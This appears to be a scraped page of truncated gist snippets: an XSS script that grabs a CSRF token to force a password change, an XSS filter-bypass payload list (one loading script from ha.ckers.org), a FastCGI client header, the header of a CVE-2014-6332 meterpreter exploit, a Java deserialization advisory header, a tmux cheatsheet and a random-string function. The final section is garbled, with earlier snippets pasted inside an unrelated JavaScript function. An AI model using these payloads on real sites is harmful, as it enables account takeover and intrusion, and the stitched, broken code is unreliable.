l0cal l0ca1

## fpm.py
import socket
import random
import argparse
import sys
from io import BytesIO

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False

## xss-xhr
<script>
var x = new XMLHttpRequest();
x.open("GET", "/lk", true);
x.onreadystatechange = function() {
    if (x.readyState == XMLHttpRequest.DONE) {
        text = x.responseText;
        text = text.substr(text.indexOf('invisible">') + 'invisible">'.length);
        csrf = text.substr(0, text.indexOf('</p>'));
        newdata = JSON.stringify({'new_password':'QWERTYqwerty1',confirm_password:'QWERTYqwerty1','token':csrf});
        y = new XMLHttpRequest();

## xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

## tmux-cheatsheet.markdown

      
              1 file
            
          
              484 forks
            
          
                55 comments
              
            
              1769 stars
            
          
                ryerh
                / tmux-cheatsheet.markdown
            
            
              Last active
              November 3, 2025 02:35
                — forked from MohamedAlaa/tmux-cheatsheet.markdown
            
              
                Tmux 快捷键 & 速查表 & 简明教程
              
          
    注意：本文内容适用于 Tmux 2.3 及以上的版本，但是绝大部分的特性低版本也都适用，鼠标支持、VI 模式、插件管理在低版本可能会与本文不兼容。
Tmux 快捷键 & 速查表 & 简明教程

启动新会话：
tmux [new -s 会话名 -n 窗口名]

恢复会话：

  
## JAVA-ADVISORY.md

      
              1 file
            
          
              8 forks
            
          
                3 comments
              
            
              27 stars
            
          
                frohoff
                / JAVA-ADVISORY.md
            
            
              Last active
              June 18, 2025 09:27
            
              
                Java 7u21 Security Advisory
              
          
    Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management
Introduction


Affected Product(s): Java SE 6, Java SE 7
Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
Vendor Contact: secalert_us@oracle.com
Vulnerability Type: Unsafe Object Deserialization


## cve-2014-6332_win7_ie11_poc.html
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit

References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

## randomWord.js
/*
** randomWord 产生任意长度随机字母数字组合
** randomFlag-是否任意长度 min-任意长度最小位[固定位数] max-任意长度最大位
** xuanfeng 2014-08-28
*/

function randomWord(randomFlag, min, max){
	var str = "",
		range = min,
		arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
	import socket
	import random
	import argparse
	import sys
	from io import BytesIO

	# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

	PY2 = True if sys.version_info.major == 2 else False
	<script>
	var x = new XMLHttpRequest();
	x.open("GET", "/lk", true);
	x.onreadystatechange = function() {
	if (x.readyState == XMLHttpRequest.DONE) {
	text = x.responseText;
	text = text.substr(text.indexOf('invisible">') + 'invisible">'.length);
	csrf = text.substr(0, text.indexOf('</p>'));
	newdata = JSON.stringify({'new_password':'QWERTYqwerty1',confirm_password:'QWERTYqwerty1','token':csrf});
	y = new XMLHttpRequest();
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	<html>
	<head>
	<!--
	CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
	- Tested on IE11 + Windows 7 64-bit

	References:
	- original PoC - http://www.exploit-db.com/exploits/35229/
	- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
	- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
	/*
	** randomWord 产生任意长度随机字母数字组合
	** randomFlag-是否任意长度 min-任意长度最小位[固定位数] max-任意长度最大位
	** xuanfeng 2014-08-28
	*/

	function randomWord(randomFlag, min, max){
	var str = "",
	range = min,
	arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];